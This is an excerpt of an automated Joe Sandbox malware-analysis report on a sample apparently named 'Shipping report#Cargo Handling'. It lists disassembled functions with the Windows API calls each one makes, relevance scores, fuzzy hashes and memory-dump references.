Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: e78aa2f20032a2061a4defa385024f0df8bbb64956218b9cb518f841f7f7e4d9
Instruction ID: 1687be1aa3f540e14a14ba5a69b301dbf376130bb565d470794074fc4d31a928
Opcode Fuzzy Hash: e78aa2f20032a2061a4defa385024f0df8bbb64956218b9cb518f841f7f7e4d9
Instruction Fuzzy Hash: 70A1C371604301AFE724DF24C886F6ABBE1AF84714F54882DF55A9B292D7B0EC41CB92

Function 000FE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 000FDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000FCF22,?), ref: 000FDDFD

Part of subcall function 000FDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000FCF22,?), ref: 000FDE16

Part of subcall function 000FE199: GetFileAttributesW.KERNEL32(?,000FCF95), ref: 000FE19A

lstrcmpiW.KERNEL32(?,?), ref: 000FE473
MoveFileW.KERNEL32(?,?), ref: 000FE4AC
_wcslen.LIBCMT ref: 000FE5EB
_wcslen.LIBCMT ref: 000FE603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 000FE650

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 2d7a6af5da5e6b11dceb9eb8462889810a50db0a91a4a3cabc5ed51ffab8d655
Instruction ID: bfa29e4af9d4df72448f99852d0ec7a74bfd2ac49b4008951f7cd4b927895e06
Opcode Fuzzy Hash: 2d7a6af5da5e6b11dceb9eb8462889810a50db0a91a4a3cabc5ed51ffab8d655
Instruction Fuzzy Hash: 825173B24087895BC764EB94DC819EFB3DCAF84340F00491EF689D3552EF74A688D766

Function 0011B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

Part of subcall function 0011C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0011B6AE,?,?), ref: 0011C9B5
Part of subcall function 0011C998: _wcslen.LIBCMT ref: 0011C9F1
Part of subcall function 0011C998: _wcslen.LIBCMT ref: 0011CA68
Part of subcall function 0011C998: _wcslen.LIBCMT ref: 0011CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0011BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0011BB63
RegCloseKey.ADVAPI32(?,?), ref: 0011BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0011BBB3

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: a4c1f8a416ab3f73cde355b20b921fd9402e9f811f834748f91038355de5ca21
Instruction ID: 66118f3a3403e4f15aef1d44b125380a617ea889596f9aeed7fd0e9669a9a03b
Opcode Fuzzy Hash: a4c1f8a416ab3f73cde355b20b921fd9402e9f811f834748f91038355de5ca21
Instruction Fuzzy Hash: 51615C7120C241AFD718DF14C491EAABBE5BF84308F54856CF4994B2A2DB31ED85DB92

Function 000F8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000F8BCD
VariantClear.OLEAUT32 ref: 000F8C3E
VariantClear.OLEAUT32 ref: 000F8C9D
VariantClear.OLEAUT32(?), ref: 000F8D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 000F8D3B

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 3e1c66dee04a4e9868c1137af64107003f0c9866e8e32c3bcae17863e2f8693b
Instruction ID: c1e5106236ec55d3e70bf21af998fd2b5b5019bc10cd1bb1354b0fe67116f66e
Opcode Fuzzy Hash: 3e1c66dee04a4e9868c1137af64107003f0c9866e8e32c3bcae17863e2f8693b
Instruction Fuzzy Hash: 1C5159B5A00619EFCB14CF68C894AEAB7F8FF89310F158559EA15DB354E730E911CB90

Function 00108AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00108BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00108BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00108C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00108C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00108C5F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: ed7e3dc0709a5736bbd273a78d23d3915756ba9d96b76f3d0c993faf1d2d6059
Instruction ID: 2fd0711bcd5ba23d7aa42a98d2f94ace5fb0db4e86d6598ded08a784089bc5c0
Opcode Fuzzy Hash: ed7e3dc0709a5736bbd273a78d23d3915756ba9d96b76f3d0c993faf1d2d6059
Instruction Fuzzy Hash: ED515735A04615EFDF11DF64C880AAEBBF1BF49314F088058E849AB3A2DB71ED51DB90

Function 00118EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00118F40
GetProcAddress.KERNEL32(00000000,?), ref: 00118FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00118FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00119032
FreeLibrary.KERNEL32(00000000), ref: 00119052

Part of subcall function 000AF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00101043,?,753CE610), ref: 000AF6E6
Part of subcall function 000AF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000EFA64,00000000,00000000,?,?,00101043,?,753CE610,?,000EFA64), ref: 000AF70D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 7a1dda7417d923f60596081ff5e7ca511b6e7ab1322d9a40d558e8b144b901c3
Instruction ID: 61bfc043ffaf4600907a260c34c07ec9c8516327946110f32c56ab657f8d90b3
Opcode Fuzzy Hash: 7a1dda7417d923f60596081ff5e7ca511b6e7ab1322d9a40d558e8b144b901c3
Instruction Fuzzy Hash: 7E514935A04205DFCB19DF58C4949EDBBF1FF49324B0580A8E81A9B762DB31ED86CB91

Function 00126B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00126C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00126C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00126C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0010AB79,00000000,00000000), ref: 00126C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00126CC7

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: f2ce41a829253bd93eaf1c911f1a53c799e36f48675996e5155956428513d05d
Instruction ID: 82ca13e958da3d38de5861b030ca46e4eab9b506ea40e4dbfa2b24f2fed48844
Opcode Fuzzy Hash: f2ce41a829253bd93eaf1c911f1a53c799e36f48675996e5155956428513d05d
Instruction Fuzzy Hash: DE41D635604124BFD728EF28DC54FA97BA5EB09360F150268F999A72E0C371ED71DA90

Function 000C2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 000C20C3
_free.LIBCMT ref: 000C20E3

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 945db331c96be23f8f708c7f921929bbe4e7d506b3ecff66826555319a741db8
Instruction ID: ccabfec59ff9987d512744abda87f6a84260a0295604899ad194c1da77e802b8
Opcode Fuzzy Hash: 945db331c96be23f8f708c7f921929bbe4e7d506b3ecff66826555319a741db8
Instruction Fuzzy Hash: 8E41A136A002009FCB24DFB8C981F9DB7E5EF99314F25456DEA15EB792DA31AD01CB80

Function 000A912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 000A9141
ScreenToClient.USER32(00000000,?), ref: 000A915E
GetAsyncKeyState.USER32(00000001), ref: 000A9183
GetAsyncKeyState.USER32(00000002), ref: 000A919D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 5890c9907c2a8a7d663b149224064cf5480859182eaed56ad3310d92201362e6
Instruction ID: 5f0a1ec545ef5b162b688468e6b9884cd370bb3e09686cc43f882a264f8aca04
Opcode Fuzzy Hash: 5890c9907c2a8a7d663b149224064cf5480859182eaed56ad3310d92201362e6
Instruction Fuzzy Hash: F4414F31A0865AFFDF159FA9C844BEEB7B4FF46320F208255E429A7290C7346950DB91

Function 00103874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 001038CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00103922
TranslateMessage.USER32(?), ref: 0010394B
DispatchMessageW.USER32(?), ref: 00103955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00103966

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: e138f225e82a453f6f57071d36ed6bab664b57d455eac40b163e6cbd9d6d368d
Instruction ID: 19504d969fe9c29eb7ade399d6b0013ffba69b3c8eee19b3533689437fe40d74
Opcode Fuzzy Hash: e138f225e82a453f6f57071d36ed6bab664b57d455eac40b163e6cbd9d6d368d
Instruction Fuzzy Hash: 8C31A270904345AEEB39CB749C49BB637ACAB15308F08456EE4F2825E0E3F49AC5CB61

Function 0010CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0010C21E,00000000), ref: 0010CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0010CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0010C21E,00000000), ref: 0010CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0010C21E,00000000), ref: 0010CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0010C21E,00000000), ref: 0010CFF2

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: bdc188e7f6e1976f6550b3bd05be5094565d39c61dad95e6eca1bd3183247990
Instruction ID: 3f768fa2e6d512f494bd012c6cd3d951b589c87efb8c4e277aaf27c0c1eb596c
Opcode Fuzzy Hash: bdc188e7f6e1976f6550b3bd05be5094565d39c61dad95e6eca1bd3183247990
Instruction Fuzzy Hash: F3314971600206EFDB24DFA5C884AAEBBFAEB14354B10452EF556D2181DB70AE41DFA1

Function 000F1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 000F1915
PostMessageW.USER32(00000001,00000201,00000001), ref: 000F19C1
Sleep.KERNEL32(00000000,?,?,?), ref: 000F19C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 000F19DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 000F19E2

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: eb107c04c5b795bf03ab9163c1bb31b6b74f2dc940c6efd1a4622d157f698a1d
Instruction ID: 6bd1b2e1fd12b401301eb233d8d4e1143ad178cbf595a6a248188c49ab606857
Opcode Fuzzy Hash: eb107c04c5b795bf03ab9163c1bb31b6b74f2dc940c6efd1a4622d157f698a1d
Instruction Fuzzy Hash: 4031E071A0421DEFCB14CFA8CD99AEE3BB5EB44314F004229FA21A72D1C3B09954EBD0

Function 00125706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00125745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0012579D
_wcslen.LIBCMT ref: 001257AF
_wcslen.LIBCMT ref: 001257BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00125816

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: faebf8cef9452e7a13daf649dc33bda79cb90445e4544c8cdefbe8e120583a42
Instruction ID: e8d8b4ae2262ba7df50ff84b9a9a7919a1844eab0faa1ea62152bd4d43114776
Opcode Fuzzy Hash: faebf8cef9452e7a13daf649dc33bda79cb90445e4544c8cdefbe8e120583a42
Instruction Fuzzy Hash: AC21A731904628EADB209FA0ECC4AEDB7B9FF04724F108116E919DB181E77089D5CF50

Function 00110930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00110951
GetForegroundWindow.USER32 ref: 00110968
GetDC.USER32(00000000), ref: 001109A4
GetPixel.GDI32(00000000,?,00000003), ref: 001109B0
ReleaseDC.USER32(00000000,00000003), ref: 001109E8

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: f58f66e3c28f021ee877ff00e47fc254fd2d14624e4d3e13ccbf6ac2d860a437
Instruction ID: 0b9e85b6aac2e01d9987a5d46102c316accd11c2d07e81eb0549c2f9600ac514
Opcode Fuzzy Hash: f58f66e3c28f021ee877ff00e47fc254fd2d14624e4d3e13ccbf6ac2d860a437
Instruction Fuzzy Hash: 4421A135A00204AFD714EF65DC94AAEBBF5EF48700F008038E94AD7762CB70AC84CB90

Function 000CCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 000CCDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000CCDE9

Part of subcall function 000C3820: RtlAllocateHeap.NTDLL(00000000,?,00161444,?,000AFDF5,?,?,0009A976,00000010,00161440,000913FC,?,000913C6,?,00091129), ref: 000C3852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000CCE0F
_free.LIBCMT ref: 000CCE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000CCE31

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: f973ab12c5129355dadc07de85741a730145cf2608c7bc27804fe2102203d4b4
Instruction ID: d16bfc1c8379b3d3e6659c99eb99b996bfaf16c0de7fe7c8879a0e1ce54971ef
Opcode Fuzzy Hash: f973ab12c5129355dadc07de85741a730145cf2608c7bc27804fe2102203d4b4
Instruction Fuzzy Hash: 180184726016157F333157BAAC89E7F69ADEFC7BA1315012DFA09C7201EA718D1281F0

Function 000A9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000A9693
SelectObject.GDI32(?,00000000), ref: 000A96A2
BeginPath.GDI32(?), ref: 000A96B9
SelectObject.GDI32(?,00000000), ref: 000A96E2

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 3c4106e61bd9417f4ee0acd1122420216b1bdac7453ad633690aa3dce2e2831c
Instruction ID: 87be839a3ec485bb3608cf814fd522ecd610187b238fbc053875b54cb3ca2eb7
Opcode Fuzzy Hash: 3c4106e61bd9417f4ee0acd1122420216b1bdac7453ad633690aa3dce2e2831c
Instruction Fuzzy Hash: 91216D74902315FBEB219FA4DC157AD3BA9BF01319F180216F410A65A0D3B059D1CFD4

Function 000F5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 000F5726
_memcmp.LIBVCRUNTIME ref: 000F5744
_memcmp.LIBVCRUNTIME ref: 000F5757
_memcmp.LIBVCRUNTIME ref: 000F576F
_memcmp.LIBVCRUNTIME ref: 000F5787

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 155ffc8f5d8b01a7835a941a13907008d8cca97ada7d8e88d757d29031d77501
Instruction ID: d3d46055664271357f12f038975b7109f44d7236199d0b4db5c4511f5eff210a
Opcode Fuzzy Hash: 155ffc8f5d8b01a7835a941a13907008d8cca97ada7d8e88d757d29031d77501
Instruction Fuzzy Hash: CD01F572249B1DBBD2586111BD82FFB73DC9B20796F400034FF059AA42F760EE21A2A0

Function 000C2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,000BF2DE,000C3863,00161444,?,000AFDF5,?,?,0009A976,00000010,00161440,000913FC,?,000913C6), ref: 000C2DFD
_free.LIBCMT ref: 000C2E32
_free.LIBCMT ref: 000C2E59
SetLastError.KERNEL32(00000000,00091129), ref: 000C2E66
SetLastError.KERNEL32(00000000,00091129), ref: 000C2E6F

Memory Dump Source

